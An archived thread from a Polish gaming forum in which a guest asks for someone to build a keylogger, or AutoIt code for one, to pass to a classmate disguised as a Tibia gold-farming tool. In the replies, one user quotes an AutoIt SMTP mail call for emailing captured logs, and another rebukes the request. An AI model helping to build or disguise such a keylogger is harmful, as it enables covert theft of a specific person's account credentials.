Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Czy Ktoś Potrafi Zrobić Keyloggera?

Gość maxiandy11

Rekomendowane odpowiedzi

Gość maxiandy11
Opublikowano

Witam Chciałbym zapytać czy ktoś umie zrobić keyloggera?? chodzi mi oto żebym mógł odzyskać konto od jednego frajera z klasy ponieważ wysłal mi jakiś plik do tibi ale on się odtworzył i nie wiedziałem że ma w sobie vira

Dlatego chciałbym mu podać program na niby że on zbiera kase w tibi a on nie ma elfa-ng wieć jescze może się uda ;p

Proszę O nie zamykanie ;/

Chodzi mi tylko o odzyskanie albo podać chociarz kod do zrobienia w autoit takiego keya ;} co śledzi klawiature

Gość maxiandy11
Opublikowano

dzienkuje nie będe sprawdzać a mam pytanko gdzie beda logi ;p

Opublikowano

wszystko pięknie tylko nie wiem jak zrobic by wysyłało na e-mail próbowałem róznymi sposobami i nic zawsze jak osiągnie tam np te 1000znaków to wyskakuje błąd ;

_INetSmtpMailcom($StmpServer, $Nadawca, $ToEmail, $GmailUser, $GmailPass, $Temat, $Tresc) 

Kocham mpcforum.pl!!!

18706.png

Opublikowano

wszystko pięknie tylko nie wiem jak zrobic by wysyłało na e-mail próbowałem róznymi sposobami i nic zawsze jak osiągnie tam np te 1000znaków to wyskakuje błąd ;

_INetSmtpMailcom($StmpServer, $Nadawca, $ToEmail, $GmailUser, $GmailPass, $Temat, $Tresc) 

ze jest nieprawidłowo zapisana

Kocham mpcforum.pl!!!

18706.png

Gość Mounthains
Opublikowano

MPC oszukuje gry, nie userów

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...